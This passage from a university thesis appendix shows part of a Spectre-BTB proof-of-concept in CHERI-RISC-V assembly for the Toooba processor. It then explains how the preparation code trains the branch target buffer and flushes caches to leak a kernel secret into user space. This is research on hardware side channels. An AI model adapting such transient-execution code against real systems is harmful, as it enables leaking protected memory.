.rept 0xc52 .byte 0x00 .endr user_funct_start: // flush caches cjalr cra, cs4 // jump to continued code // this jump will be used for aliasing and MUST NOT be // moved around. If moved around, the corresponding // jump in the kernel code must be adjusted as well cjr cs5 84 APPENDIX B. FULL CHERI-RISC-V ATTACK

.rept 0x40 .byte 0x00 .endr user_funct_cont: // load from ct6

// This is the transient-execution sequence // revealing the secret value cld t5, 0(ct6) cincoffset ct5, ct6, t5 cld t5, 0(ct5) // call kernel_funct ecall // infinite loop user_funct_loop: add t1, x0, x0 beq t1, x0, user_funct_loop In this appendix, I explain how I conducted a Spectre-BTB attack written in CHERI-RISC-V assembly. However, I do not explain the specific Spectre- BTB vulnerability as I have already done so in Chapters 4 and 5. The code is separated in preparation code, kernel code, and user code. The goal of the attack is to leak a kernel-space secret from user space. I will only describe the preparation code as the kernel and user space code depicted above shows large similarities to the attack described in Section 5.1.3. The task is to bring Toooba from integer pointer mode to capability pointer mode, which is achieved in change_to_cap_mode by setting the corre- sponding flag to a code capability and then jumping to it. The next step is to set up capability registers with code and data capabilities used during the demon- stration of the attack later. This is done in the code following the init_caps label. The principle is always the same. First, the almighty capability stored in ddc is moved to a register and the base address of the capability is specified. As the second and last step, the bounds are set. The largest part of the preparation code is to set up Toooba such that the kernel code runs in S privilege mode and the user code runs in U privilege mode. The kernel code will be called during exception handling, which re- quires that I need to enable exceptions (done in init_exceps) and set up exception vectors. A pointer to the function kernel_funct is stored in APPENDIX B. FULL CHERI-RISC-V ATTACK 85

stcc – the capability extended register for the exception vector base address register in S privilege mode – setting up exception handling. Finally, the code changes privilege mode to U mode and jumps to the function user_funct – the beginning of the user code. The two instructions in the function user_funct_start constitute the last part of the preparation code. The first instruction is a call to the flush function defined earlier in the code. This ensures that a load in the kernel code will miss all caches and therefore enable the attack due to Toooba mis- speculating for a longer time. The second instruction is a jump to the label user_funct_cont. This jump instruction trains the BTB as described in Chapter 5. The ecall instruction is an environment call, which is handled by the kernel code. This effectively starts the attack. A probing function is not shown in the attack example above. At multiple places in the code, I use assembler macros that insert zero bytes or no-operations (). This is used in order to align instructions in memory such that the BTB aliasing approaches works. The .section statements have the same task, but on a coarser scale. TRITA-EECS-EX-2021:61

www.kth.se